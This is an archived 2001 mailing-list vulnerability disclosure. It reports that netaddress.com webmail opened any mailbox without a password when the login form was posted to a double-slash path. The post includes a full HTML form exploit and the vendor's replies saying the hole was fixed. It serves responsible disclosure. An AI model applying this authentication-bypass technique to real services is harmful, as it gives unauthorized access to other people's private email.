OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: syed mohamed (syedblrhotmail.com)
Date: Thu Aug 02 2001 - 13:32:36 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hi,

    Vulnerable
    ==========
    netaddress.com mailing service

    This mail is Continuation of the previous mails i sent regarding security
    flaw in netaddress.com, which will open anybody's mailbox with out password.

    i got a mail with attached html page. which is nothing but saved html home
    page of netaddress.com(old one).Itz old home page design. when i submit the
    form without password it opened the mail box. Yes it opens every mail box
    without password. All you need is valid netaddress id.

    Problem:

    While submitting the login form to /tpl/Door/Login it needs just only three
    parameters maidid, domainid(value=4), domain(value=usa.net). Create a html
    file which contains all the three parameters. sumit the form to
    http://netaddress.com//tpl/door/login . Note that give double slash after
    neraddress.com. while i tried with single slash it didn`t work.

    Here is the Exploit code(save this as html and run it in local. Submit only
    with userid)

    Exploit Code:

    <html>
    <form name="loginform"
                  action="http://classic.netaddress.com//tpl/Door/LoginPost"
    method="POST" target=_blank>
    <input type="hidden" name="LoginState" value="2">

                <input type="hidden" name="DomainID" value="4">
                 <input type="hidden" name="Domain" value="usa.net">

    <b><font color="#FF0000" size="2" face="Arial">Netaddress Security hole -
    Demo</font></b><font face="Arial" size="2"><br>
    <br>
    Developed By Syed Mohamed (<a
    href="mailto:syedblrhotmail.com">syedblrhotmail.com</a>)<br>
    <br>
    Just Enter Login ID (enter example if netaddress id is
    exampleusa.net)</font>
    <p>

    <input type="text" size="16" name="UserID"
                   value="">
    <input type="submit" value="Login">
    </form>
    </p>
    </html>

    I hv informed the issue to usa.net.( i had only abuse and postmaster id of
    usa.net.. info id bounced back) ook 3 hrs to solve this issue.
    Now they hv solved the issue.

    Vendor's response:
    ==================
    First Response:
    ===============
    Thank you for your notification. We are addressing this issue.

    Regards,
    USA.NET, Inc.

    Second Response:
    ================
    Dear Sir/Madam,

    USA.NET’s technical and security teams have been made aware of this issue
    and it has been corrected. We appreciate your patience as we strive to
    bring you the most robust email solution possible.

    Regards,
    Abuse Dept.
    abuseusa.net
    USA.Net, Inc.

    Third Respose:
    =============
    Yes, this problem has been corrected.

    Thank you for your assistance,

    USA.NET, Inc.

    Thankx to usa.net for responding with great speed

    Thankx to my friend Thejaswini who forwarded the old netaddress html page.

    Regards
    Syed Mohamed
    syedblrhotmail.com
    (Wanna defeat hackers..think like a hacker.. work like a secutity expert)

    _________________________________________________________________
    Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp